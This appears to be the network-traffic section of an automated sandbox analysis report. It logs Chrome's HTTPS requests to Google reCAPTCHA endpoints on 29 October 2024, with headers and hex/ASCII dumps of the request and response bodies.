                                                                                                                                                                                                                                                                  2024-10-29 19:11:03 UTC1378INData Raw: 22 73 1b 3a 22 32 12 1c 67 b8 04 63 3d 7f ce 28 8e a0 b5 67 48 6e 8a 7c 90 5a 2b 28 18 27 cc db 93 f4 a2 aa 59 ea 0b 1c 6d fe 82 5c b3 16 27 1d ff 00 1e 68 a4 ac 53 6c f2 fd 28 65 14 80 07 96 01 3c 7d ee 2b 13 51 31 48 c4 a3 e7 1b 86 d2 31 8e 6b a3 8c 2c 16 82 34 18 66 fb c7 d3 b0 ac 57 b5 81 09 0b 79 c9 eb f3 af 15 df 18 a4 cf 32 4d ed 12 95 ad bb 0b 47 98 4d 13 44 49 0c 81 be 64 20 e3 a1 1c f6 e9 9a 63 b2 94 e6 4c 11 f8 e7 da b4 e7 b7 b4 82 d4 05 b9 0d fd ff 00 98 67 93 9c fe 75 95 7f 1c 5e 7b 1b 66 0c ac c7 18 61 c7 3f fd 6a 99 ea ee 85 28 f2 9d 1f 85 6c 0e b7 6f 32 45 04 f7 05 42 8d 90 21 2e 32 c1 38 1c e7 97 5f c4 8a bf a8 e8 10 db b5 91 ba b2 d7 63 58 a5 61 38 7b 42 bb 50 c4 30 47 1f de 1f 96 2b 8e d3 2e 0d 94 f9 32 32 93 fd de 31 df 1f 9d 7b 35 a7
                                                                                                                                                                                                                                                                  Data Ascii: "s:"2gc=(gHn|Z+('Ym\'hSl(e<}+Q1H1k,4fWy2MGMDId cLgu^{fa?j(lo2EB!.28_cXa8{BP0G+.221{5
                                                                                                                                                                                                                                                                  2024-10-29 19:11:03 UTC761INData Raw: 0c f3 44 f4 56 43 8e e7 76 7c 67 67 6f 14 86 cb c0 fe 0e b1 67 5d bb e3 b3 e4 7e 67 1f a6 2a 8e ab f1 16 fa 7b 44 b2 36 de 1a 86 d3 24 9b 75 b1 88 c6 58 e3 e6 2a d9 19 e2 9f 17 8c f4 8b 52 59 3c 0f e0 b0 1b e5 f2 e4 b2 57 03 8e b9 e0 ff 00 fa ea c7 fc 2d 3b cb 60 5e d3 c3 1e 19 84 93 8d b1 5a b1 8c f1 ce 57 71 19 ae 0e 5f 2f eb ee 3a af 6e a7 8d 7c 41 8e 5f 3a e6 e9 ec cd bb 4b 70 59 c1 52 a2 46 25 88 91 06 31 b5 87 3c 74 3e 80 8a d7 f8 59 e1 bb bd 6b 51 d0 2d 13 cd 8d 3e d2 f7 6e ec b8 55 0a 46 7a 8c 76 ef dc 9a f4 39 fc 5d e2 4d 7e e6 2b bb 9f 0a d9 ea 91 ed 22 18 1f 4e 96 78 63 53 83 95 42 70 49 c7 de 39 3e 84 0e 2b d9 f4 fb 38 34 fb 38 61 5b 78 ac f7 a8 61 1c 49 b0 02 46 48 db d0 0f cb 15 cf 88 af 56 9a 51 82 57 ef 7d 89 8d 25 27 7b 9c 7f 8c 3c 11 a0
                                                                                                                                                                                                                                                                  Data Ascii: DVCv|ggog]~g*{D6$uX*RY<W-;`^ZWq_/:n|A_:KpYRF%1<t>YkQ->nUFzv9]M~+"NxcSBpI9>+848a[xaIFHVQW}%'{<
                                                                                                                                                                                                                                                                  2024-10-29 19:11:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  100192.168.2.1649833142.250.184.2284437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:11:04 UTC998OUTPOST /recaptcha/api2/replaceimage?k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Content-Length: 5836
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Origin: https://www.google.com
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Referer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:11:04 UTC5836OUTData Raw: 76 3d 2d 5a 47 37 42 43 39 54 78 43 56 45 62 7a 49 4f 32 6d 34 32 39 75 73 62 26 63 3d 30 33 41 46 63 57 65 41 35 31 68 35 34 6b 43 36 55 72 34 42 6c 41 50 68 59 31 75 67 58 63 7a 55 50 74 35 78 34 55 62 34 61 77 4d 32 67 4e 64 76 59 62 46 30 69 78 56 78 56 42 58 55 71 74 4d 62 30 54 7a 7a 44 69 34 66 44 73 78 79 42 64 38 4e 2d 4c 4f 73 38 44 45 7a 70 51 46 4c 4d 55 5a 49 42 35 6a 30 53 36 31 70 50 56 73 56 6e 67 41 72 5f 39 4c 51 78 79 43 6b 58 4a 75 4f 53 51 39 6d 63 55 32 77 56 2d 76 63 70 79 4d 47 6c 31 46 39 65 5a 49 74 45 79 59 51 4a 78 54 64 71 78 69 33 57 73 53 71 69 6d 56 79 51 61 6f 6a 2d 44 57 6b 42 79 77 38 79 6e 36 68 61 42 34 32 58 51 36 4b 35 39 6b 2d 75 6a 30 43 33 57 62 6a 57 5f 39 47 41 37 6a 54 47 33 6c 53 50 44 6a 78 31 65 6e 79 66 37
                                                                                                                                                                                                                                                                  Data Ascii: v=-ZG7BC9TxCVEbzIO2m429usb&c=03AFcWeA51h54kC6Ur4BlAPhY1ugXczUPt5x4Ub4awM2gNdvYbF0ixVxVBXUqtMb0TzzDi4fDsxyBd8N-LOs8DEzpQFLMUZIB5j0S61pPVsVngAr_9LQxyCkXJuOSQ9mcU2wV-vcpyMGl1F9eZItEyYQJxTdqxi3WsSqimVyQaoj-DWkByw8yn6haB42XQ6K59k-uj0C3WbjW_9GA7jTG3lSPDjx1enyf7
                                                                                                                                                                                                                                                                  2024-10-29 19:11:04 UTC694INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:11:04 GMT
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  Cache-Control: private
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  2024-10-29 19:11:04 UTC684INData Raw: 31 37 64 30 0d 0a 29 5d 7d 27 0a 5b 22 64 72 65 73 70 22 2c 22 30 33 41 46 63 57 65 41 36 69 6a 71 44 52 4a 4e 55 76 55 4a 4c 47 7a 49 68 69 42 63 36 75 31 4f 76 65 62 45 50 46 62 44 5a 47 66 52 64 44 42 75 6a 75 45 48 46 4a 64 63 30 31 55 6b 63 51 69 6b 73 51 34 6a 47 47 46 6e 6a 75 46 65 70 44 72 69 59 68 51 63 31 73 34 6f 4e 2d 63 37 7a 31 63 69 5a 36 52 35 57 51 66 57 31 34 77 75 57 65 4a 78 6c 7a 72 30 61 53 70 32 58 68 55 6c 31 50 4a 7a 58 42 57 4d 4c 6e 42 66 52 73 41 4c 47 70 2d 38 42 65 68 53 36 30 53 43 73 5a 43 79 33 4d 66 70 6c 52 72 68 6c 55 30 69 6b 76 4c 6a 71 49 6b 53 77 48 57 58 4f 78 6f 4a 30 56 72 35 74 6a 69 51 61 67 45 7a 63 39 4f 65 32 53 38 70 46 78 6b 52 42 32 68 54 59 76 32 6c 36 50 6c 74 48 4e 42 57 68 62 37 70 58 61 6b 42 45 6a
                                                                                                                                                                                                                                                                  Data Ascii: 17d0)]}'["dresp","03AFcWeA6ijqDRJNUvUJLGzIhiBc6u1OvebEPFbDZGfRdDBujuEHFJdc01UkcQiksQ4jGGFnjuFepDriYhQc1s4oN-c7z1ciZ6R5WQfW14wuWeJxlzr0aSp2XhUl1PJzXBWMLnBfRsALGp-8BehS60SCsZCy3MfplRrhlU0ikvLjqIkSwHWXOxoJ0Vr5tjiQagEzc9Oe2S8pFxkRB2hTYv2l6PltHNBWhb7pXakBEj
                                                                                                                                                                                                                                                                  2024-10-29 19:11:04 UTC1378INData Raw: 36 4b 5a 6d 67 30 70 6f 35 4f 55 30 4a 79 5a 4c 71 63 35 6c 4d 39 62 30 37 55 37 47 43 58 42 45 61 5f 31 65 4c 59 50 39 39 52 63 6c 54 65 45 4d 54 56 78 32 50 79 74 4e 4b 48 6a 43 73 69 2d 62 48 6d 47 4d 50 73 55 48 69 65 59 51 2d 6b 51 72 68 75 2d 6a 52 46 4b 36 45 4a 6f 4c 48 37 2d 38 71 6a 71 4a 57 5f 53 52 79 49 44 4b 63 4b 4a 4e 56 67 38 5a 53 43 69 63 45 43 46 37 57 46 54 47 6f 78 70 4e 50 55 56 74 4d 4e 59 6d 76 43 56 49 30 67 39 7a 5a 44 4e 62 67 37 4b 47 2d 68 33 36 4c 46 64 2d 7a 48 68 6a 45 62 4f 6e 61 6d 64 46 41 51 67 45 5a 78 68 5a 32 49 4e 74 65 62 5f 4b 71 79 6f 56 59 70 5f 4b 2d 39 56 49 35 6b 4f 67 4b 46 6b 6a 78 4c 6d 67 4c 57 46 30 73 4e 63 66 5a 69 6f 4b 41 75 4c 58 44 62 32 73 4d 44 6d 33 37 4e 4e 66 76 67 55 68 31 7a 6b 6e 33 36 47
                                                                                                                                                                                                                                                                  Data Ascii: 6KZmg0po5OU0JyZLqc5lM9b07U7GCXBEa_1eLYP99RclTeEMTVx2PytNKHjCsi-bHmGMPsUHieYQ-kQrhu-jRFK6EJoLH7-8qjqJW_SRyIDKcKJNVg8ZSCicECF7WFTGoxpNPUVtMNYmvCVI0g9zZDNbg7KG-h36LFd-zHhjEbOnamdFAQgEZxhZ2INteb_KqyoVYp_K-9VI5kOgKFkjxLmgLWF0sNcfZioKAuLXDb2sMDm37NNfvgUh1zkn36G
                                                                                                                                                                                                                                                                  2024-10-29 19:11:04 UTC1378INData Raw: 65 41 71 35 66 41 48 38 46 78 57 41 69 43 77 74 7a 63 70 6d 72 51 4f 30 71 71 4b 51 6f 63 78 6f 51 47 4b 6d 7a 73 74 47 57 74 66 73 30 7a 46 2d 7a 50 4a 4c 68 4a 55 6c 33 66 43 34 42 38 47 63 38 46 68 70 56 69 36 49 63 70 4d 42 4e 70 33 59 46 49 77 59 5a 44 51 5a 74 62 79 6a 4b 46 5a 4b 49 32 50 78 34 49 50 67 58 4c 71 62 31 6c 67 7a 64 79 6d 42 51 4a 72 54 62 46 4c 44 70 4a 76 32 75 66 46 52 5a 37 46 2d 47 50 36 69 4d 6d 30 73 6a 41 46 37 59 37 44 6e 77 77 61 47 33 39 6a 79 64 4f 66 4d 4b 35 50 6e 43 68 51 5a 52 4f 68 58 61 72 6f 57 34 2d 4d 6b 31 70 74 38 34 36 4c 7a 73 44 63 78 30 6f 66 57 47 76 41 41 39 4c 38 38 58 55 63 79 75 55 54 56 68 38 72 74 30 56 54 35 39 6b 44 56 49 4e 4f 34 54 34 6c 78 66 43 38 6b 39 52 7a 61 4e 49 53 4d 56 65 5a 6f 34 47 32
                                                                                                                                                                                                                                                                  Data Ascii: eAq5fAH8FxWAiCwtzcpmrQO0qqKQocxoQGKmzstGWtfs0zF-zPJLhJUl3fC4B8Gc8FhpVi6IcpMBNp3YFIwYZDQZtbyjKFZKI2Px4IPgXLqb1lgzdymBQJrTbFLDpJv2ufFRZ7F-GP6iMm0sjAF7Y7DnwwaG39jydOfMK5PnChQZROhXaroW4-Mk1pt846LzsDcx0ofWGvAA9L88XUcyuUTVh8rt0VT59kDVINO4T4lxfC8k9RzaNISMVeZo4G2
                                                                                                                                                                                                                                                                  2024-10-29 19:11:04 UTC1378INData Raw: 33 49 37 45 74 76 31 65 41 76 31 38 42 52 53 51 6c 64 62 46 43 6d 46 4e 74 45 52 70 59 67 79 47 4b 50 57 5f 55 39 36 34 52 38 4d 33 51 66 68 6d 4a 63 4f 64 31 35 52 61 6a 6e 43 6c 6e 37 4a 38 56 44 6c 41 6f 64 54 37 4c 77 4c 45 66 61 6b 6c 39 4d 5f 36 49 2d 6e 72 4a 67 7a 4f 33 75 39 66 79 6f 58 74 72 4d 57 44 5a 73 4a 68 6b 36 5a 4c 63 79 57 4d 30 65 43 77 72 45 77 59 47 52 77 66 78 42 30 52 2d 68 33 32 2d 51 43 50 50 38 43 53 6c 76 68 61 45 6c 44 35 64 45 54 48 73 44 61 43 79 6c 66 4e 72 6b 77 4e 6c 67 4c 33 79 68 56 68 52 66 53 6f 4e 63 50 67 55 34 62 4c 4f 75 35 58 4f 73 39 46 41 68 62 4d 67 62 38 66 4d 7a 47 35 6f 46 50 41 44 76 6c 2d 6b 6a 4c 41 50 41 63 68 65 36 77 67 79 52 78 4f 6a 36 73 59 56 47 33 79 68 6a 58 79 65 56 48 69 35 54 52 77 37 70 33
                                                                                                                                                                                                                                                                  Data Ascii: 3I7Etv1eAv18BRSQldbFCmFNtERpYgyGKPW_U964R8M3QfhmJcOd15RajnCln7J8VDlAodT7LwLEfakl9M_6I-nrJgzO3u9fyoXtrMWDZsJhk6ZLcyWM0eCwrEwYGRwfxB0R-h32-QCPP8CSlvhaElD5dETHsDaCylfNrkwNlgL3yhVhRfSoNcPgU4bLOu5XOs9FAhbMgb8fMzG5oFPADvl-kjLAPAche6wgyRxOj6sYVG3yhjXyeVHi5TRw7p3
                                                                                                                                                                                                                                                                  2024-10-29 19:11:04 UTC1286INData Raw: 50 39 66 31 70 68 37 55 65 34 50 47 46 70 2d 32 47 79 4e 4c 6c 36 38 56 32 67 70 41 6a 32 6c 4c 68 34 75 45 65 68 6e 54 7a 2d 70 68 6b 4b 48 34 7a 6f 42 4e 50 73 4c 42 35 6f 6c 7a 63 6b 44 58 4d 63 2d 4c 62 58 5a 36 70 72 31 33 45 6a 74 6f 44 31 36 45 38 4e 61 35 65 5a 2d 5a 38 67 7a 64 64 76 56 6d 62 44 44 6a 4e 35 49 32 62 73 34 59 31 39 6e 41 57 34 30 68 35 4e 64 56 78 4b 33 53 43 33 79 53 31 71 70 51 6e 51 64 69 36 38 46 71 6a 4f 38 36 57 68 57 2d 79 78 34 49 4b 58 4c 58 4f 5f 65 38 41 39 70 49 76 48 58 53 4b 5f 74 79 71 6a 6c 6e 6c 41 44 65 38 6d 6a 4c 78 51 67 71 6e 45 52 32 79 2d 51 4f 35 51 35 31 66 49 6e 52 4b 37 63 30 6d 75 65 7a 46 4e 49 47 48 32 46 64 69 35 51 51 47 62 71 61 32 75 61 4a 78 70 6d 59 72 78 37 71 54 43 70 74 54 71 67 55 55 74 69
                                                                                                                                                                                                                                                                  Data Ascii: P9f1ph7Ue4PGFp-2GyNLl68V2gpAj2lLh4uEehnTz-phkKH4zoBNPsLB5olzckDXMc-LbXZ6pr13EjtoD16E8Na5eZ-Z8gzddvVmbDDjN5I2bs4Y19nAW40h5NdVxK3SC3yS1qpQnQdi68FqjO86WhW-yx4IKXLXO_e8A9pIvHXSK_tyqjlnlADe8mjLxQgqnER2y-QO5Q51fInRK7c0muezFNIGH2Fdi5QQGbqa2uaJxpmYrx7qTCptTqgUUti
                                                                                                                                                                                                                                                                  2024-10-29 19:11:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  101192.168.2.1649831142.250.186.1644437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:11:04 UTC612OUTGET /recaptcha/api2/replaceimage?k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:11:04 UTC743INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:11:04 GMT
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Allow: POST
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  2024-10-29 19:11:04 UTC635INData Raw: 36 38 30 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 35 20 28 42 61 64 20 52 65 71 75 65 73 74 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f
                                                                                                                                                                                                                                                                  Data Ascii: 680<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 405 (Bad Request)!!1</title><style>*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{backgro
                                                                                                                                                                                                                                                                  2024-10-29 19:11:04 UTC1036INData Raw: 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67
                                                                                                                                                                                                                                                                  Data Ascii: idth:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#log
                                                                                                                                                                                                                                                                  2024-10-29 19:11:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  102192.168.2.1649832142.250.186.1644437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:11:04 UTC858OUTGET /recaptcha/api2/payload?p=06AFcWeA5CRWb0pqYXQQK9znJ5KV0VwEOa4LwTb8cyN7pOwIZZ04W9ux6A5u-MAbH1xLyDQMREJb298rgjzqYg-SfwWz7xWuHpDGxazw8zRRljMsmI_2zKtxQ_m35rkCI5Lk7f5FhQABxvWvoIdrGF0A4ARXIg27QobrPOi2xAvxvGvMxG3zZi2Qucrr1lJTYtpc5XFS8wOT6E2kdH05v1_mpmO1RBCjs__A&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF&id=70db3a36bb8782c5 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:11:04 UTC681INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                                                                                                  Expires: Tue, 29 Oct 2024 19:11:04 GMT
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:11:04 GMT
                                                                                                                                                                                                                                                                  Cache-Control: private, max-age=30
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-10-29 19:11:04 UTC697INData Raw: 31 30 36 65 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 01 00 01 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0a 0b 09 0c 11 0f 12 12 11 0f 11 10 13 16 1c 17 13 14 1a 15 10 11 18 21 18 1a 1c 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c0 00 11 08 00 64 00 64 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71
                                                                                                                                                                                                                                                                  Data Ascii: 106eJFIFC!"$"$Cdd"}!1AQa"q
